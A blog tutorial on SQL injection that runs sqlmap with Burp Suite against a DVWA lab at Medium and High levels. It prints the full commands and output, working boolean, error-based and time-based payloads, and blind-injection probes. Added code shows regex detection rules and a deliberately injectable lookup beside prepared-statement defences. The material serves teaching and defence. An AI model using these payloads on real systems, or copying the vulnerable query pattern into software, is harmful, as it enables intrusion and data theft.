SQL Injection Vulnerability Principles and Tools - Security Tools Series

Author: DreamsonMa | Published 2019-05-02 15:43

    SQL injection is the insertion of SQL commands into a web form submission, an input field, a domain name, or the query string of a page request, so that the server is tricked into executing attacker-controlled SQL. Through SQL injection the data store behind the application can be probed.

    A SQL injection vulnerability arises when both of the following hold:

    1. User input is not controlled
    2. The input is carried into a SQL statement and executed

    Using SQLMAP for SQL injection

    At DVWA's High level the page that submits the query and the page that displays the result are different pages, and no 302 redirect links them. The purpose is to defeat ordinary sqlmap injection: during injection sqlmap cannot read the query result from the submission page, and without that feedback it cannot go any further. So we switch to the Medium level.

    The following shows how to use sqlmap together with Burp Suite for SQL injection:

    1. Intercept the request with Burp Suite

    [Figure: intercepting the request in Burp Suite]

    2. Save the request to a file

    ➜  sql_inject cat medium.req 
    POST /DVWA/vulnerabilities/sqli/ HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/DVWA/vulnerabilities/sqli/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 18
    Cookie: security=medium; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    id=1&Submit=Submit
    

    3. Run sqlmap against the saved request

    ➜  sql_inject sqlmap -r medium.req --dbms=mysql  --level=5 --risk=3 -p id --dbs
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.3#stable}
    |_ -| . ["]     | .'| . |
    |___|_  ["]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 03:39:24 /2019-05-02/
    
    [03:39:24] [INFO] parsing HTTP request from 'medium.req'
    [03:39:24] [INFO] testing connection to the target URL
    [03:39:24] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
        Payload: id=1 OR NOT 4345=4345&Submit=Submit
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1 AND (SELECT 9913 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(9913=9913,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)&Submit=Submit
    ---
    [03:39:24] [INFO] testing MySQL
    [03:39:24] [INFO] confirming MySQL
    [03:39:25] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 7.2.7, Apache 2.4.33
    back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
    [03:39:25] [INFO] fetching database names
    [03:39:25] [INFO] used SQL query returns 11 entries
    [03:39:25] [INFO] resumed: '632-sit'
    [03:39:25] [INFO] resumed: 'alan-oauth'
    [03:39:25] [INFO] resumed: 'dvwa'
    [03:39:25] [INFO] resumed: 'information_schema'
    [03:39:25] [INFO] resumed: 'ins_tc_prd'
    [03:39:25] [INFO] resumed: 'konga_database'
    [03:39:25] [INFO] resumed: 'mysql'
    [03:39:25] [INFO] resumed: 'performance_schema'
    [03:39:25] [INFO] resumed: 'phpmyadmin'
    [03:39:25] [INFO] resumed: 'renren_fast'
    [03:39:25] [INFO] resumed: 'test'
    available databases [11]:
    [*] 632-sit
    [*] alan-oauth
    [*] dvwa
    [*] information_schema
    [*] ins_tc_prd
    [*] konga_database
    [*] mysql
    [*] performance_schema
    [*] phpmyadmin
    [*] renren_fast
    [*] test
    
    [03:39:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'
    
    [*] ending @ 03:39:25 /2019-05-02/
    

    Using SQLMAP for blind SQL injection testing

    In blind injection the server does not return the query's result to the client. Blind injection still allows the application's data store to be probed. The types of blind injection and how to recognise them:

    1. Time-based: watch for a delay in the response
      Input: 1 and sleep(5) #
      Input: 1' and sleep(5) #

    2. Boolean-based: watch whether the returned result changes
      Input: 1' and 1=1 #
      Input: 1' and 1=2 #

    The following shows how to use sqlmap together with Burp Suite for blind SQL injection:

    1. Capture the request with Burp Suite

    ➜  sql_inject cat hight_blind.req 
    GET /DVWA/vulnerabilities/sqli_blind/ HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/DVWA/security.php
    Cookie: id=1; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    

    2. Run a blind-injection test with sqlmap

    ➜  sql_inject sqlmap -r hight_blind.req --dbms=mysql  --level=5 --risk=3 -o  -p id --dbs
            ___
           __H__
     ___ ___[']_____ ___ ___  {1.3#stable}
    |_ -| . [)]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 04:51:00 /2019-05-02/
    
    [04:51:00] [INFO] parsing HTTP request from 'hight_blind.req'
    [04:51:01] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
    do you want to try URI injections in the target URL itself? [Y/n/q] 
    [04:51:09] [INFO] testing connection to the target URL
    [04:51:09] [INFO] checking if the target is protected by some kind of WAF/IPS
    [04:51:09] [INFO] testing NULL connection to the target URL
    [04:51:09] [INFO] NULL connection is supported with GET method ('Range')
    [04:51:09] [INFO] testing if the target URL content is stable
    [04:51:10] [INFO] target URL content is stable
    [04:51:10] [INFO] testing if URI parameter '#1*' is dynamic
    [04:51:10] [WARNING] URI parameter '#1*' does not appear to be dynamic
    [04:51:10] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
    [04:51:10] [INFO] testing for SQL injection on URI parameter '#1*'
    [04:51:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [04:51:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
    [04:51:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
    [04:51:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
    [04:51:18] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
    [04:51:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
    [04:51:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
    [04:51:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
    [04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
    [04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
    [04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
    [04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
    [04:51:21] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
    [04:51:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [04:51:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [04:51:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
    [04:51:26] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [04:51:28] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [04:51:30] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [04:51:32] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [04:51:34] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [04:51:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [04:51:38] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
    [04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
    [04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
    [04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
    [04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
    [04:51:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [04:51:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [04:51:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [04:51:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [04:51:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [04:51:42] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [04:51:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [04:51:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    [04:51:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [04:51:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [04:51:44] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [04:51:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [04:51:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [04:51:46] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [04:51:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [04:51:47] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [04:51:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [04:51:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [04:51:49] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [04:51:50] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [04:51:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [04:51:50] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [04:51:51] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [04:51:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
    [04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
    [04:51:51] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
    [04:51:51] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
    [04:51:51] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [04:51:51] [INFO] testing 'MySQL inline queries'
    [04:51:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
    [04:51:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [04:51:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
    [04:51:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
    [04:51:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    [04:51:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [04:51:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [04:51:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
    [04:51:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
    [04:51:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
    [04:51:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [04:51:56] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
    [04:51:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
    [04:51:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
    [04:51:57] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
    [04:51:58] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
    [04:51:59] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
    [04:51:59] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
    [04:52:00] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
    [04:52:00] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
    [04:52:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
    [04:52:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
    [04:52:02] [INFO] testing 'MySQL AND time-based blind (ELT)'
    [04:52:02] [INFO] testing 'MySQL OR time-based blind (ELT)'
    [04:52:03] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
    [04:52:03] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
    [04:52:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [04:52:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [04:52:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
    [04:52:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
    [04:52:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
    [04:52:04] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
    [04:52:04] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
    [04:52:04] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
    [04:52:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
    [04:52:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
    [04:52:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [04:52:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
    it is not recommended to perform extended UNION tests if there is not at least one other (potential) technique found. Do you want to skip? [Y/n] 
    [04:52:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
    [04:52:22] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
    [04:52:26] [WARNING] URI parameter '#1*' does not seem to be injectable
    do you want to URL encode cookie values (implementation specific)? [Y/n] 
    [04:52:29] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
    [04:52:32] [INFO] testing for SQL injection on Cookie parameter 'id'
    [04:52:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [04:52:33] [INFO] Cookie parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
    [04:52:33] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [04:52:33] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    [04:52:35] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [04:52:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [04:52:35] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [04:52:35] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [04:52:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [04:52:36] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [04:52:36] [INFO] Cookie parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
    [04:52:36] [INFO] testing 'MySQL inline queries'
    [04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
    [04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
    [04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
    [04:52:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    [04:52:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [04:52:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [04:52:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
    [04:53:35] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
    [04:53:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [04:53:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [04:53:45] [INFO] target URL appears to be UNION injectable with 2 columns
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 
    [04:53:47] [INFO] testing 'Generic UNION query (28) - 21 to 40 columns'
    [04:53:57] [INFO] testing 'Generic UNION query (28) - 41 to 60 columns'
    [04:54:16] [INFO] testing 'Generic UNION query (28) - 61 to 80 columns'
    [04:54:21] [INFO] testing 'Generic UNION query (28) - 81 to 100 columns'
    [04:54:37] [INFO] testing 'MySQL UNION query (28) - 1 to 20 columns'
    [04:54:39] [INFO] testing 'MySQL UNION query (28) - 21 to 40 columns'
    [04:54:55] [INFO] testing 'MySQL UNION query (28) - 41 to 60 columns'
    [04:54:55] [INFO] testing 'MySQL UNION query (28) - 61 to 80 columns'
    [04:55:06] [INFO] testing 'MySQL UNION query (28) - 81 to 100 columns'
    Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
    sqlmap identified the following injection point(s) with a total of 5089 HTTP(s) requests:
    ---
    Parameter: id (Cookie)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 5259=5259-- ySeP; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' OR (SELECT 6054 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6054=6054,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VDSN; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=1' OR SLEEP(5)-- JOIw; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
    ---
    [04:56:12] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 7.2.7, Apache 2.4.33
    back-end DBMS: MySQL >= 5.0
    [04:56:12] [INFO] fetching database names
    [04:56:17] [INFO] used SQL query returns 11 entries
    [04:56:17] [INFO] starting 3 threads
    [04:56:21] [INFO] retrieved: '632-sit'
    [04:56:21] [INFO] retrieved: 'dvwa'
    [04:56:21] [INFO] retrieved: 'alan-oauth'
    [04:56:21] [INFO] retrieved: 'information_schema'
    [04:56:21] [INFO] retrieved: 'ins_tc_prd'
    [04:56:21] [INFO] retrieved: 'konga_database'
    [04:56:21] [INFO] retrieved: 'mysql'
    [04:56:25] [INFO] retrieved: 'performance_schema'
    [04:56:25] [INFO] retrieved: 'phpmyadmin'
    [04:56:25] [INFO] retrieved: 'renren_fast'
    [04:56:25] [INFO] retrieved: 'test'
    available databases [11]:
    [*] 632-sit
    [*] alan-oauth
    [*] dvwa
    [*] information_schema
    [*] ins_tc_prd
    [*] konga_database
    [*] mysql
    [*] performance_schema
    [*] phpmyadmin
    [*] renren_fast
    [*] test
    
    [04:56:25] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 2896 times, 404 (Not Found) - 3441 times
    [04:56:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'
    
    [*] ending @ 04:56:25 /2019-05-02/
    
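    The two runs above show where sqlmap's probes actually travel: at the Medium level the boolean payload (id=1 OR NOT 4345=4345) sits in the POST body, while at the High level the id parameter lives in the Cookie header, which is where the SLEEP(5) and FLOOR(RAND(0)*2) payloads were found. The request inspector below is an added example, not part of the original post or of sqlmap: it URL-decodes every parameter in the query string, form body and cookie of a request and flags the probe patterns seen in this article (sleep(), tautologies such as 1=1 or 4345=4345, quote-then-AND/OR, comment terminators, FLOOR(RAND()) error-based payloads, information_schema reads). The SAMPLE_REQUESTS dictionaries are constructed to mirror the captured requests, with placeholder session ids; the rule set and the inspect_request/flagged functions are this example's own.

```python
"""Added example (not from the original post): flag SQL-injection probe
patterns in every injectable surface of an HTTP request: query, body, cookie.
The rules below are this example's own, not sqlmap's detection logic."""
import re
from urllib.parse import parse_qsl, unquote

# (rule name, regex) pairs, tested against each decoded parameter value.
RULES = [
    ("time-based",   re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    # AND/OR [NOT] x=x, with or without quotes: 1=1, 4345=4345, '1'='1
    ("tautology",    re.compile(r"\b(and|or)\s+(not\s+)?(['\"]?)(\w+)\3\s*=\s*\3\4", re.I)),
    # a closing quote immediately followed by a logical operator
    ("quote-logic",  re.compile(r"['\"]\s*(and|or)\b", re.I)),
    ("comment-tail", re.compile(r"(--\s|#|/\*)")),
    ("error-based",  re.compile(r"floor\s*\(\s*rand\s*\(|extractvalue\s*\(|updatexml\s*\(", re.I)),
    ("schema-read",  re.compile(r"information_schema", re.I)),
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
]


def _surfaces(req):
    """Split a request dict into decoded (name, value) lists per surface."""
    headers = req.get("headers", {})
    out = {"query": parse_qsl(req.get("url", "").partition("?")[2],
                              keep_blank_values=True)}
    body = req.get("body", "")
    if body and "application/x-www-form-urlencoded" in headers.get("Content-Type", ""):
        out["body"] = parse_qsl(body, keep_blank_values=True)
    # Cookie values are not form-encoded, so decode %XX only (keep '+').
    cookie = headers.get("Cookie", "")
    out["cookie"] = [(k.strip(), unquote(v))
                     for k, _, v in (c.partition("=") for c in cookie.split(";")
                                     if c.strip())]
    return out


def inspect_request(req):
    """Return {surface: {param: [matched rule names]}} for flagged parameters."""
    findings = {}
    for surface, params in _surfaces(req).items():
        for name, value in params:
            hits = [rule for rule, rx in RULES if rx.search(value)]
            if hits:
                findings.setdefault(surface, {})[name] = hits
    return findings


def flagged(requests):
    """Names of the requests in a {name: request} mapping that trip any rule."""
    return sorted(n for n, r in requests.items() if inspect_request(r))


# Constructed samples mirroring the captured requests in the article.
SAMPLE_REQUESTS = {
    # medium.req with sqlmap's boolean payload form-encoded in the body
    "medium_body_probe": {
        "method": "POST", "url": "/DVWA/vulnerabilities/sqli/",
        "headers": {"Content-Type": "application/x-www-form-urlencoded",
                    "Cookie": "security=medium; PHPSESSID=constructed0001"},
        "body": "id=1+OR+NOT+4345%3D4345&Submit=Submit",
    },
    # hight_blind.req: id travels in the cookie, time-based payload
    "high_cookie_probe": {
        "method": "GET", "url": "/DVWA/vulnerabilities/sqli_blind/",
        "headers": {"Cookie": "id=1' OR SLEEP(5)-- JOIw; security=high; "
                              "PHPSESSID=constructed0001"},
        "body": "",
    },
    # an ordinary lookup for comparison
    "benign": {
        "method": "GET",
        "url": "/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit",
        "headers": {"Cookie": "security=high; PHPSESSID=constructed0001"},
        "body": "",
    },
}

if __name__ == "__main__":
    for name, req in SAMPLE_REQUESTS.items():
        print(name, inspect_request(req))
```

    Inspecting the cookie is the point worth taking from the High-level run: a filter that only looks at the query string and form body would have let the injectable id parameter through, and the 403/404 counts that sqlmap reports at the end of its run (2896 and 3441 in the output above) are the kind of per-client error burst that should be alerted on alongside these pattern hits.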

    SQL injection defences

    1. Filter user input
    2. Use prepared statements (PDO, SqlParameter)
    3. Use a secure SQL-handling API such as those from OWASP
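    The example below is added here and is not code from the original post or from DVWA. It reproduces the two root causes named at the top of the article (uncontrolled input, input spliced into the SQL text) against an in-memory SQLite table, beside defences 1 and 2 from the list above (allow-list validation, prepared statements), and uses the boolean probe pair from the blind-injection section as the check that tells a leaking endpoint from a hardened one. The users table, the lookup_* functions and has_boolean_oracle() are constructed for this example; SQLite has no SLEEP(), so only the boolean probe is exercised, and it is written with a trailing quote instead of MySQL's # comment so it parses in SQLite.

```python
"""Added example (not from the original post): string-built SQL beside
parameter binding and input validation, checked with the boolean probe pair."""
import sqlite3


def make_db():
    # Constructed sample data standing in for DVWA's users table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    return con


def lookup_vulnerable(con, user_id):
    # Root cause: the raw parameter is concatenated into the statement text, so a
    # quote in the input closes the literal and the rest is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_prepared(con, user_id):
    # Defence 2: parameter binding. The value is sent separately from the
    # statement and can never change its structure (PDO / SqlParameter do the same).
    return con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def lookup_validated(con, user_id):
    # Defence 1: allow-list validation in front of binding. A user id is a
    # decimal integer; anything else is rejected before it reaches the database.
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("user_id must be a decimal integer")
    return lookup_prepared(con, int(user_id))


# The boolean probe pair from the blind-injection section, in SQLite form.
PROBE_TRUE = "1' AND '1'='1"
PROBE_FALSE = "1' AND '1'='2"


def has_boolean_oracle(lookup, con):
    """True when the true/false probes give different answers, i.e. the lookup
    leaks a boolean-based blind oracle. A hardened lookup answers identically
    for both (an empty result here, or a validation error)."""
    try:
        return lookup(con, PROBE_TRUE) != lookup(con, PROBE_FALSE)
    except ValueError:
        return False


if __name__ == "__main__":
    con = make_db()
    print("tautology, vulnerable:", lookup_vulnerable(con, "1' OR '1'='1"))  # all rows
    print("tautology, prepared:  ", lookup_prepared(con, "1' OR '1'='1"))    # []
    print("oracle, vulnerable:", has_boolean_oracle(lookup_vulnerable, con))  # True
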